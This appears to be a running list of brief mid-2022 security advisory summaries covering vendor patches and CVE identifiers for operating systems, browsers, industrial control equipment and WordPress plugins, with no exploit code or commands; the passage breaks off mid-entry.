Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-29599 (Critical), CVE-2021-36773 (High), CVE-2022-31214 (High)
MITRE has released a list of the top 25 most dangerous software weaknesses that can cause
exploitation of vulnerabilities and allow adversaries to completely take over a system,
steal data, or prevent applications from working.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.11 and 102, Firefox 102, and Firefox ESR 91.11. An attacker can exploit these
vulnerabilities to take control of an affected system.
ABB has released security updates to address multiple incorrect default permissions
vulnerabilities in its equipment- e-Design which can allow privilege escalation or a
Denial-of Service (DoS) condition. The affected products are e-Design all versions prior to
1.12.2.0006. CVE ID: CVE-2022-28702 (Medium), CVE-2022-29483 (High)
Multiple Operational Technology (OT):ICEFAL vulnerabilities have been discovered in Omron
Equipment- SYSMAC CS/CJ/CP Series & NJ/NX Series. Successful exploitation of these
vulnerabilities can cause a Denial-of-Service (DoS) condition and allow Remote Code
Execution (RCE). CVE ID: CVE-2022-31204 (Medium), CVE-2022-31205 (Medium), CVE-2022-31206 (Medium),
CVE-2022-31207 (Medium)
A missing authentication for critical function, Operational Technology (OT):ICEFAL
vulnerability has been discovered in Motorola Solutions' Equipment- MOSCAD IP Gateway all
versions and ACE IP Gateway all versions. Successful exploitation of this vulnerability can
result in manipulation of device configuration. CVE ID: CVE-2022-30276 (High)
Multiple Operational Technology (OT):ICEFAL vulnerabilities have been discovered in Motorola
Solutions' Equipment- MDLC. Successful exploitation of these vulnerabilities can result in
message manipulation, exposure of the attack surface of the MDLC protocol parser, memory
corruption, and exposure of sensitive information. The affected product are MDLC versions
4.80.0024, 4.82.004 & 4.83.001. CVE ID: CVE-2022-30273 (Medium), CVE-2022-30275 (High)
Huawei has released a security update to address a password verification vulnerability in
WS7200-10 which can cause disclosure of sensitive system information. The affected product
is WS7200-10 version 11.0.2.13. CVE ID: CVE-2022-33735 (Medium)
Foxit has released an updated Foxit PDF Reader 12.0 and Foxit PDF Editor 12.0 to resolve
multiple vulnerabilities in Foxit PDF Reader version 11.2.2.53575 & earlier, Foxit PDF
Editor version 11.2.2.53575 & all previous 11.x versions and Foxit PDF Editor version
10.1.8.37795 & earlier versions.
Hitachi Energy has released security updates to address a vulnerability in the Modbus stack
that can cause stack overflow which results in a reboot of the product. The affected
products are Hitachi Energy's RTU500 series. CVE ID: CVE-2022-2081 (High)
Advantech has released security update to address multiple vulnerabilities in Advantech's
Equipment- iView that can cause read or modify sensitive data, disclose information, or
execute arbitrary code. The affected products are Advantech iView management software, all
versions prior to 5_7_04_6469. CVE ID: CVE-2022-2143 (Critical), CVE-2022-2135 (High), CVE-2022-2136 (High),
CVE-2022-2137 (Medium), CVE-2022-2142 (High), CVE-2022-2138 (High), CVE-2022-2139 (Medium)
Multiple Operational Technology (OT):ICEFALL vulnerabilities have been discovered in all
version of Motorola Solutions ACE1000, a Remote Terminal Unit (RTU). Remediation and
upgradation are available. CVE ID: CVE-2022-30271 (Critical), CVE-2022-30270 (Critical), CVE-2022-30274 (High),
CVE-2022-30269 (Medium), CVE-2022-30272 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Dev channel 104.0.5112.23 (Platform version: 14909.26.0) for most
ChromeOS devices, Stable channel 103.0.5060.66 for Windows, and Stable channel 103.0.5060.64
(Platform version: 14816.82.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address a vulnerable USB2CAN interface
implementation in Linux kernel. A local attacker can use this vulnerability to cause a
denial of service (system crash). CVE ID: CVE-2022-28388 (High)
Dell has released security updates to address OpenSSL vulnerability in Dell Precision
Workstation that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-0778 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor that may allow privileged code in a PV guest VM to compromise the host. CVE ID: CVE-2022-26362 (Medium), CVE-2022-21123, CVE-2022-21125, CVE-2022-21127,
CVE-2022-21166
OFFIS has released security updates to address Path Traversal, Relative Path Traversal, and
NULL Pointer Dereference vulnerabilities in its Equipment- DCMTK. Successful exploitation of
these vulnerabilities can allow an attacker to cause a denial-of-service condition, write
malformed DICOM files into arbitrary directories, and gain remote code execution. CVE ID: CVE-2022-2119 (High), CVE-2022-2120 (High), CVE-2022-2121 (Medium)
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard
Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network
defenders that cyber threat actors, including state-sponsored advanced persistent threat
(APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and
Unified Access Gateway (UAG) servers to obtain initial access to organisations that did not
apply available patches or workarounds.
Ubuntu has released security updates to resolve multiple vulnerabilities in Apache HTTP
Server. An attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Chrome 104 (104.0.5112.20) Beta channel for Windows, Mac & Linux, Chrome
Beta 104 (104.0.5112.22) for iOS and Chrome Dev 105 (105.0.5135.3) & Chrome Beta 104
(104.0.5112.18) for Android.
CODESYS has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-31802 (Critical), CVE-2022-31803 (Critical), CVE-2022-31804
(Critical), CVE-2022-31805 (Critical), CVE-2022-31806 (Critical), CVE-2022-1965 (High),
CVE-2022-32136 (High), CVE-2022-32137 (High), CVE-2022-32138 (High), CVE-2022-32139 (High),
CVE-2022-32140 (High), CVE-2022-32141 (High), CVE-2022-32142 (High), CVE-2022-32143 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vendor's Operational Technology (OT) products are affected with a set of 56
vulnerabilities named "ICEFALL", triggered due to insecure-by-design practices in OT. The
products affected by OT:ICEFALL are known to be prevalent in industries that are the
backbone of critical infrastructures.
Cybersecurity authorities from the United States, New Zealand, and the United Kingdom have
released a joint Cybersecurity Information Sheet (CIS) on PowerShell. The CIS provides
recommendations for proper configuration and monitoring of PowerShell, as opposed to
removing or disabling it entirely due to its use by malicious actors after gaining access
into victim networks. These recommendations will help defenders detect and prevent abuse by
malicious cyber actors, while enabling legitimate use by administrators and defenders.
Ubuntu has released security updates to resolve a vulnerability in Squid and Squid3 packages
which incorrectly handled the Gopher protocol that caused Squid to crash, resulting in a
Denial of Service (DoS). CVE ID: CVE-2021-46784
Cisco has released security updates to resolve arbitrary code execution and command
injection vulnerabilities in multiple Cisco products. An attacker can exploit these
vulnerabilities to take control of an affected system. CVE ID: CVE-2022-20828 (Medium), CVE-2022-20829 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Free Live Chat
Support WordPress plugin. The affected versions are Free Live Chat Support versions up to,
and including 1.0.11. CVE ID: CVE-2022-2039 (High)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the DX Share
Selection WordPress plugin. The affected versions are DX Share Selection plugin versions up
to, and including 1.4. CVE ID: CVE-2022-2001 (High)
Dell has released security updates to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-4160 (Medium), CVE-2022-24423 (Medium), CVE-2022-0778 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An out-of-bounds write vulnerability has been discovered in the utilized component
EtherNet/IP Adapter Development Kit (EADK) of Pyramid Solutions used in Weidmueller
Interface. Successful exploitation of vulnerability by sending a specially crafted packet
can result in a Denial of Service (DoS) condition. CVE ID: CVE-2022-1737 (Critical)
An insufficient verification of data authenticity vulnerability has been discovered Phoenix
Contact's equipment- ProConOS/ProConOS eCLR and MULTIPROG that can allow uploading of
arbitrary malicious code after gaining access to the communication to products utilizing it.
The mitigations and workarounds are available. CVE ID: CVE-2022-31801 (Critical)
An insufficient verification of data authenticity vulnerability has been discovered in
Phoenix Contact's equipments- ILC, AXC, RFC, PC WORX & FC, that can allow an attacker to
upload logic with arbitrary code. The mitigations and workarounds are available. CVE ID: CVE-2022-31800 (Critical)
A missing authentication for critical function vulnerability has been discovered in several
Phoenix Contact's equipments. Successful exploitation of vulnerability can allow changes to
configurations, manipulate services, or cause a Denial of Service (DoS) condition. The
mitigations and workarounds are available. CVE ID: CVE-2019-9201 (Critical)
It has been discovered that if SIMATIC WinCC OA implements client-side only authentication
when neither server-side authentication (SSA) nor Kerberos authentication is enabled, can
allow attackers to impersonate as other users or exploit the client-server protocol without
being authenticated. Remediation is available. CVE ID: CVE-2022-33139 (Critical)
Google has released Chrome 103 (103.0.5060.53) for Android, Extended Stable channel
102.0.5005.134 for Windows & Mac, Chrome Stable 103 (103.0.5060.54) for iOS, LTS LTC-102
102.0.5005.75 (Platform Version: 14695.85.0) for most ChromeOS devices, Chrome Dev 104
(104.0.5112.18) for Android, and Chrome 103 stable channel (103.0.5060.53)for Windows, Mac
and Linux to resolve multiple vulnerabilities. CVE ID: CVE-2022-2156 (Critical)
A missing authentication for critical function vulnerability has been discovered in JTEKT's
Equipment- TOYOPUC Products, that can cause a Denial of Service condition, change control
logic, or disable communication links. Workarounds are available. CVE ID: CVE-2022-29951 (High), CVE-2022-29958 (High)
It has been discovered that SMA Technologies OpCon UNIX agent adds the same SSH key on every
installation and subsequent updates. An attacker with access to the private key can gain
root access on affected systems. SMA Technologies has released a tool to address this
vulnerability. CVE ID: CVE-2022-2154
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
QNAP NAS has released security updates to resolve a vulnerability in PHP that affects its
operating system. Successful exploitation can cause Remote Code Execution (RCE). The
affected products are QTS 5.0.x and later, QTS 4.5.x and later, QuTS hero h5.0.x and later,
QuTS hero h4.5.x and later and QuTScloud c5.0.x and later. CVE ID: CVE-2019-11043 (High)
OpenSSL has released security updates to resolve vulnerability that can cause the execution
of arbitrary commands with the privileges. This vulnerability affects OpenSSL versions
1.0.2, 1.1.1 and 3.0. CVE ID: CVE-2022-2068 (Medium)
Foxit has released an updated Foxit PhantomPDF 10.1.8 to resolve multiple vulnerabilities in
Foxit PhantomPDF version 10.1.7.37777 and earlier versions.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Yokogawa STARDOM. An attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-29519 (Medium), CVE-2022-30997 (Medium)
Spring has released security updates to address SpEL Injection vulnerability through
annotated query methods with SpEL expressions in Spring Data MongoDB application. The
affected products are Spring Data MongoDB 3.4.0, 3.3.0 to 3.3.4 and older, unsupported
versions. CVE ID: CVE-2022-22980
Ubuntu has released security updates to resolve multiple vulnerabilities in Intel Microcode.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-0127 (Medium), CVE-2021-0145 (Medium), CVE-2021-0146 (Medium),
CVE-2021-33117 (Medium), CVE-2021-33120 (Medium), CVE-2022-21123, CVE-2022-21127,
CVE-2022-21151 (Medium), CVE-2022-21166
Huawei has released security update to address an input verification vulnerability in Huawei
printers. Successful exploitation of this vulnerability can cause device service exceptions.
CVE ID: CVE-2022-34159 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has announced that it will remove Basic authentication in Exchange Online for
Exchange ActiveSync (EAS), POP, IMAP, Remote PowerShell, Exchange Web Services (EWS),
Offline Address Book (OAB), Outlook for Windows, and Mac. All organisations are urged to
expedite migration to Modern Authentication ("Modern Auth") before Microsoft begins
permanently disabling Basic Auth on October 1, 2022, for all protocols. This decision
requires customers to move from apps that use basic authentication to apps that use Modern
authentication.
FastJson has released security update to resolve vulnerability in its package before 1.2.83
which allows attackers to utilise “AutoTypeCheck” mechanism and achieve Remote Code
Execution (RCE) in FastJson. CVE ID: CVE-2022-25845 (Critical)
WordPress has released security updates to resolve a sensitive information disclosure
vulnerability in GiveWP – Donation Plugin and Fundraising Platform plugins. The affected
versions are GiveWP – Donation Plugin and Fundraising Platform plugins versions up to, and
including, 2.20.2. CVE ID: CVE-2022-2117 (Medium)
Google has released Dev channel 104.0.5112.14 for Windows, Mac & Linux, Chrome Beta 104
(104.0.5112.8) for iOS, Dev channel 104.0.5112.12 for Mac & Linux and 104.0.5112.14 for
Windows, and Chrome Dev 104 (104.0.5112.10) for Android.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-21123, CVE-2022-21125, CVE-2022-21166
HP has released security update to address a vulnerability that allows unauthorized
modification of certain files in HP ThinPro 7.2 Service Pack 8 (SP8) affecting its thin
client products. HP has released Service Pack 10 (SP10) to remediate the
vulnerability. CVE ID: CVSS-2022-1602 (Medium)
Dell has released security updates for Dell EMC PowerScale OneFS to address multiple
vulnerabilities that can be exploited by malicious users to compromise the affected
system. CVE ID: CVE-2022-31229 (Critical), CVE-2022-31230 (High)
Multiple vulnerabilities have been discovered in AutomationDirect equipment- DirectLOGIC
with Ethernet Communication Modules that can cause a loss of sensitive information,
unauthorised changes and a Denial of Service (DoS) condition. The mitigations are
available. CVE ID: CVE-2022-2004 (High), CVE-2022-2003 (High)
AutomationDirect has released security updates to resolve a vulnerability which can cause
cleartext transmission of sensitive information in its Equipment- DirectLOGIC with Serial
Communication. CVE ID: CVE-2022-2003 (High)
AutomationDirect has released security updates to address multiple vulnerabilities in its
Equipment- C-more EA9 HMI that can cause a loss of sensitive information and the ability to
run code execution with elevated privileges. CVE ID: CVE-2022-2006 (High), CVE-2022-2005 (High)
Multiple vulnerabilities have been discovered in Hillrom Medical Equipment- Welch Allyn
medical devices. Successful exploitation of these vulnerabilities can allow an attacker to
compromise software security by executing commands, gaining privileges, reading sensitive
information, evading detection, etc. CVE ID: CVE-2022-26388 (Medium), CVE-2022-26389 (High)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the WordPress
plugin Button Widget Smartsoft. The affected products are Button Widget Smartsoft versions
up to, and including, 1.0.1. CVE ID: CVE-2022-1912 (High)
WordPress has released security updates to resolve a vulnerability in Wbcom Designs –
BuddyPress Group Reviews plugins. The affected versions are Wbcom Designs – BuddyPress Group
Reviews plugins versions up to, and including, 2.8.3. CVE ID: CVE-2022-2108 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A Remote Code Execution (RCE) vulnerability has been discovered in the web-based management
interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers that can cause
an affected device to restart unexpectedly, resulting in a Denial of Service (DoS)
condition. Cisco will not release software updates as routers have entered the end-of-life
process. CVE ID: CVE-2022-20825 (Critical)
Cisco released a security update to resolve an authentication bypass vulnerability in Cisco
Secure Email & Web Manager that can cause an unauthenticated remote attacker to bypass
authentication and log in to the web management interface of an affected device. CVE ID: CVE-2022-20798 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-31626, CVE-2022-31625
Google has released updated Stable channel 102.0.5005.125 (Platform version: 14695.107.0)
for most ChromeOS devices, Beta channel 103.0.5060.53 for Windows, Mac & Linux, Dev channel
104.0.5110.0 for Windows, Mac & Linux, and Chrome Beta 103 (103.0.5060.53) for Android.
Synaptics has released security updates to address a vulnerability in Synaptics Fingerprint
drivers that use SGX that can cause Denial of Service (DoS) and information disclosure.
CVE ID: CVE-2021-3675
Spring has released a security update to address a Denial of Service (DoS) vulnerability in
Spring Cloud Function 3.2.5 and prior versions. CVE ID: CVE-2022-22979 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Cisco has released security updates and work around to resolve multiple vulnerabilities in
its products. CVE ID: CVE-2022-20733, CVE-2022-20736, CVE-2022-20817, CVE-2022-20819,
CVE-2022-20664
A vulnerability has been discovered in AMD processors which by using frequency scaling may
allow an authenticated attacker to execute a timing attack to potentially enable information
disclosure. CVE ID: CVE-2022-23823
Windows has released security updates to address a Remote Code Execution (RCE) vulnerability
in Windows Network File System. CVE ID: CVE-2022-30136 (Critical)
Zoom has released security updates to resolve insufficient authorisation check and DLL
injection vulnerabilities in its platform. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-28749 (Medium), CVE-2022-22788 (High)
Hitachi Energy has released security update to resolve a vulnerability in Actbar2.ocx module
that affects Hitachi Energy's equipment- PROMOD IV. An attacker who successfully exploit
this vulnerability can delete arbitrary files once the system is compromised. CVE ID: CVE-2010-3591 (Critical)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit these vulnerabilities to take control of an affected system.
Adobe has released security updates to address vulnerabilities in its products. An attacker
can exploit these vulnerabilities to take control of an affected system.
Citrix has released security updates to address multiple vulnerabilities in Application
Delivery Management (Citrix ADM). An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-27511, CVE-2022-27512
Johnson Controls has released security updates to resolve Unverified Password Change, and
Cross-site Scripting vulnerabilities in its Equipment- Metasys ADS/ADX/OAS Servers.
Successful exploitation of these vulnerabilities can allow unauthorized users to compromise
passwords and inject malicious code into web interfaces. CVE ID: CVE‐2022‐21935 (High), CVE‐2022‐21937 (High), CVE‐2022‐21938 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Meridian Cooperative has released security update to address an Improper Access Control
vulnerability in its Equipment- Meridian. Successful exploitation of this vulnerability can
result in a disclosure of sensitive information. CVE ID: CVE-2022-29578 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Intel products. An attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-24436 (Medium), CVE-2022-21180 (Medium), CVE-2022-21123 (medium),
CVE-2022-21125 (medium), CVE-2022-21127 (medium), CVE-2022-21166 (medium)
SAP has released security updates to address vulnerabilities affecting multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
A Denial of Service (DoS) vulnerability has been discovered in Mitsubishi Electric's
Equipment- MELSEC-Q and L series CPU modules. A malicious attacker can cause a DoS condition
in ethernet communications by sending a specially crafted packet. CVE ID: CVE-2022-24946 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve a path traversal vulnerability in
rubygem-sinatra. The affected product is SUSE OpenStack Cloud Crowbar 8. CVE ID: CVE-2022-29970 (High)
Multiple vulnerabilities have been discovered in Trendnet TEW-831DR WiFi Router. Trendnet
has released security updates for a few vulnerabilities. CVE ID: CVE-2022-30325 (Medium), CVE-2022-30326 (Medium), CVE-2022-30327 (High),
CVE-2022-30328 (Medium), CVE-2022-30329 (Medium)
Debian has released security updates to address multiple vulnerabilities in the VLC media
player, which can result in the execution of arbitrary code or Denial of Service (DoS) if a
malformed media file is opened. CVE ID: CVE-2020-26664 (High)
A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Mitsol Social Post
Feed WordPress plugins versions up to and including 1.10. CVE ID: CVE-2022-0209 (Medium)
Drupal uses third-party Guzzle library for handling HTTP requests and responses to external
services. Guzzle has released security updates to resolve multiple vulnerabilities which
affect some contributed projects or custom code on Drupal sites. CVE ID: CVE-2022-31042 (High), CVE-2022-31043
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Moxa has released a security update to resolve multiple out-of-bounds write vulnerabilities
in Moxa's equipment- NPort 5110 Series Firmware Version 2.10.
A vulnerability in Data Distribution Service (DDS) software component has been discovered in
Medtronic’s Valleylab™ FX8 and FT10 energy platforms. Medtronics has released a security
update for Valleylab™ FX8 and mitigation for Valleylab™ FT10 energy platform to address
vulnerability. CVE ID: CVE-2021-43547(High)
Google has released Chrome Dev 104 (104.0.5108.0) for Android, Extended Stable channel
102.0.5005.115 for Windows & Mac, Chrome Beta 103 (103.0.5060.42) for iOS and Stable
channel 102.0.5005.115 for Windows, Mac & Linux to resolve multiple
vulnerabilities. CVE ID: CVE-2022-2007 (High), CVE-2022-2008 (High), CVE-2022-2010 (High),
CVE-2022-2011 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Dell has released security updates to address multiple vulnerabilities in Dell SupportAssist
for Home PCs and Business PCs that can be exploited by malicious users to compromise the
affected system. CVE ID: CVE-2022-29092 (High), CVE-2022-29093 (High), CVE-2022-29094 (High),
CVE-2022-29095 (High)
Apache has released security updates for its HTTP Server to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-26377, CVE-2022-28330, CVE-2022-28614, CVE-2022-29404,
CVE-2022-30522, CVE-2022-30556, CVE-2022-31813
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in ToolBar to Share
WordPress plugins versions up to and including 2.0.
CVE ID: CVE-2022-1918 (High)
It has been discovered that Festo controller CECC-X-M1 product family in multiple versions
are affected by multiple preauthentication command injection vulnerabilities. Any person who
is able to gain access to the webserver can run arbitrary system commands on the device with
root privileges.
CVE ID: CVE-2022-30308 (Critical), CVE-2022-30309 (Critical), CVE-2022-30310
(Critical), CVE-2022-30311 (Critical)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Beta channel 103.0.5060.42 for Windows, Mac and Linux, Beta channel
103.0.5060.37 (Platform version: 14816.49.0) for most ChromeOS devices, and Chrome Beta 103
(103.0.5060.42) for Android.
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Copify WordPress
plugins versions up to, and including, 1.3.0. CVE ID: CVE-2022-1900 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released a security update to resolve an improper authentication vulnerability in
Dell iDRAC9. Successful exploitation can cause gain to the VNC Console. The affected
products are iDRAC9 versions 5.00.00.00 and later but before 5.10.10.00. CVE ID: CVE-2022-24422 (Critical)
Android has released security bulletin to resolve multiple vulnerabilities affecting several
Android devices. Security patch levels of 2022-06-05 or later address all of these issues.
CVE ID: CVE-2022-20130 (Critical), CVE-2022-20127 (Critical), CVE-2022-20140
(Critical), CVE-2022-20145 (Critical), CVE-2022-20210 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1304 (High), CVE-2022-30787, CVE-2022-30784 (Medium), CVE-2022-30783
(Medium), CVE-2022-30788 (Medium), CVE-2022-30789 (Medium), CVE-2022-30786 (Medium),
CVE-2022-30785 (Medium), CVE-2022-30790
NVIDIA has released a security update to resolve multiple vulnerabilities in the NVIDIA DGX
A100 firmware, which can lead to information disclosure, Denial of Service (DoS), or
escalation of privileges. CVE ID: CVE-2022-28200 (High), CVE-2022-31599 (High), CVE-2022-31600 (High),
CVE-2022-31601 (Medium), CVE-2022-31602 (Medium), CVE-2022-31603 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in encryption communications of Mitsubishi
Electric air conditioning systems that can cause information disclosure, information
tampering and Denial of Service (DoS). The mitigations are available. CVE ID: CVE-2022-24296 (Low), CVE-2016-2183 (High), CVE-2013-2566 (Medium),
CVE-2015-2808 (Medium), CVE-2009-3555 (High)
A password-guessing attacks and CRLF injection vulnerabilities have been discovered in Zyxel
in GS1200 series switches and in its legacy firewalls respectively. The mitigations are
available.
Owl Labs has released security updates to address a vulnerability in Meeting Owl Pro which,
can cause disclosure of sensitive information. CVE ID: CVE-2022-31460
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
SUSE has released security updates to resolve multiple vulnerabilities in Linux
Kernel. CVE ID: CVE-2022-30594 (High), CVE-2022-1048 (High), CVE-2022-30594 (High)
Huawei has released a security updates to address an improper input verification and command
injection vulnerabilities in its products. Successful exploitation of these vulnerabilities
can lead to service abnormal and highest privileges of the printer respectively. CVE ID: CVE-2022-32203 (Critical), CVE-2022-32204 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CODESYS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1989 (High), CVE-2022-1794 (High), CVE-2022-30791 (Medium),
CVE-2022-30792 (Medium), CVE-2021-21863 (High), CVE-2021-21864 (High), CVE-2021-21865
(High), CVE-2021-21866 (High), CVE-2021-21867 (High), CVE-2021-21868 (High), CVE-2021-21869
(High)
An arbitrary out-of-bounds write and buffer overflow vulnerabilities have been discovered in
U-Boot. CVE ID: CVE-2022-30790 (Critical), CVE-2022-30552 (High)
Multiple vulnerabilities have been discovered in Dominion Voting Systems Democracy Suite
ImageCast X, which is an in-person voting system used to allow voters to mark their
ballot. CVE ID: CVE-2022-1739, CVE-2022-1740, CVE-2022-1741, CVE-2022-1742, CVE-2022-1743,
CVE-2022-1744, CVE-2022-1745, CVE-2022-1746, CVE-2022-1747
Dell has released security updates to address multiple vulnerabilities in its products that
can be exploited by malicious users to compromise the affected system.
Google has released Dev channel 104.0.5098.0 for Windows, Mac and Linux, Chrome Beta 103
(103.0.5060.34) for iOS, and Chrome Dev 104 (104.0.5097.3) for Android.
Yokogawa has released security update to address a vulnerability in Wide Area Communication
Router (WAC Router). If WAC Router is subjected to a DoS attack with malformed packets, the
functions provided by WAC Router can stop.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A Reflected Cross-Site Scripting vulnerability in WordPress plugins Download Manager and
Stored Cross-Site Scripting vulnerability in WordPress plugins Ultimate Member have been
discovered. The updates are available. CVE ID: CVE-2022-1985 (Medium), CVE-2022-1208 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
An unauthenticated remote code execution vulnerability has been discovered in Atlassian
Confluence Server and Data Center. CVE ID: CVE-2022-26134 (Critical)
Illumina has released security update to resolve multiple vulnerabilities in Illumina's
Equipment- Local Run Manager (LRM). Successful exploitation of these vulnerabilities can
allow an unauthenticated malicious actor to take control of the affected product remotely
and take any action at the operating system level. CVE ID: CVE-2022-1517 (Critical), CVE-2022-1518 (Critical), CVE-2022-1519 (Critical),
CVE-2022-1521 (Critical), CVE-2022-1524 (High)
Multiple vulnerabilities such as Protection Mechanism Failure, Forced Browsing, Classic
Buffer Overflow, Path Traversal, and OS Command Injection have been discovered in Carrier
LenelS2's Equipment- HID Mercury access panels sold by LenelS2. An attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-31479 (Critical), CVE-2022-31480 (High), CVE-2022-31481 (Critical),
CVE-2022-31482 (High), CVE-2022-31483 (Critical), CVE-2022-31484 (High), CVE-2022-31485
(Medium), CVE-2022-31486 (High)
Mitsubishi Electric has released security updates to resolve Denial of Service(DoS) and
Remote Code Execution Vulnerability due to Improper Input Validation in Mitsubishi
Electric's Equipment- MELSEC-Q Series, MELSEC-L Series, and MELSEC iQ-R Series. A remote
unauthenticated attacker can cause a denial of service (DoS) condition or execute malicious
code on target products by sending specially crafted packets. CVE ID: CVE-2022-25163 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that Mobile browser color select plugin for WordPress is vulnerable
to Cross-Site Request Forgery. This vulnerability can allow unauthenticated attackers to
inject malicious web scripts via forged request granted to trick a site administrator into
performing an action such as clicking on a link. CVE ID: CVE-2022-1969 (High)
Mozilla has released security update to address a SQL injection vulnerability in Firefox for
iOS 101. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1887 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22965 (Critical), CVE-2022-20742 (High), CVE-2022-20715 (High),
CVE-2022-20759 (High), CVE-2022-20759 (High), CVE-2022-20745 (High), CVE-2022-20737 (High),
CVE-2022-20760 (High), CVE-2022-20774 (Medium), CVE-2022-20821 (Medium)
Huawei has released a security update to address an insufficient input verification
vulnerability in Huawei products. Successful exploitation of this vulnerability can lead to
service abnormal. CVE ID: CVE-2022-32144 (High)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.10, Firefox 101, and Firefox ESR 91.10. An attacker can exploit these vulnerabilities to
take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities such as Insufficient Session Expiration, and Not Using Password
Aging have been discovered in Becton, Dickinson and Company's Equipment- Synapsys, and
